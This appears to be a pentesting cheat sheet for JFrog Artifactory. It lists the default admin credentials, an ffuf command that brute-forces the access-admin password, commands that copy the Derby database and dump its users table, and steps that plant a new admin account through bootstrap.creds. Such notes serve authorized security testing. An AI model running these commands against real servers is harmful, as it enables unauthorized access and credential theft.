# Artifactory

* <https://keramas.github.io/2020/04/03/jfrog-ssrf-vulnerability.html>

{% hint style="info" %}
Default credentials 👉🏻 `admin:password`.
{% endhint %}

## Brute Force access-admin

* <https://jfrog.com/knowledge-base/how-to-change-the-default-password-for-access-admin-user/>
* <https://github.com/ffuf/ffuf-scripts>

Brute force access-admin's password with [ffuf](https://github.com/ffuf/ffuf):

```
$ echo -n access-admin > usernames.txt
$ ./ffuf_basicauth.sh usernames.txt passwords.txt | ffuf -c -u http://192.168.1.11:8081/artifactory/api/v1/system/health -w -:AUTH -H 'Authorization: Basic AUTH' -H 'Content-Type: application/json' -fc 403
```

## Enumeration

Spot running processes:

```
$ ps aux | grep artifactory
```

Files location:

```
$ find /opt/jfrog/artifactory/var/data/artifactory/filestore
```

Backup location:

```
$ find /opt/jfrog/artifactory/var/backup/access
```

## Compromise Database

```
$ mkdir /tmp/dbcopy
$ sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/dbcopy
$ sudo chmod 755 /tmp/dbcopy/derby
$ sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij
ij> connect 'jdbc:derby:/tmp/dbcopy/derby';
ij> select * from access_users;
```

## Add Admin Account

```
$ sudo bash -c "echo 'snovvcrash*=Passw0rd!' > /opt/jfrog/artifactory/var/etc/access/bootstrap.creds"
$ sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/bootstrap.creds
$ sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
$ sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start
$ sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log
```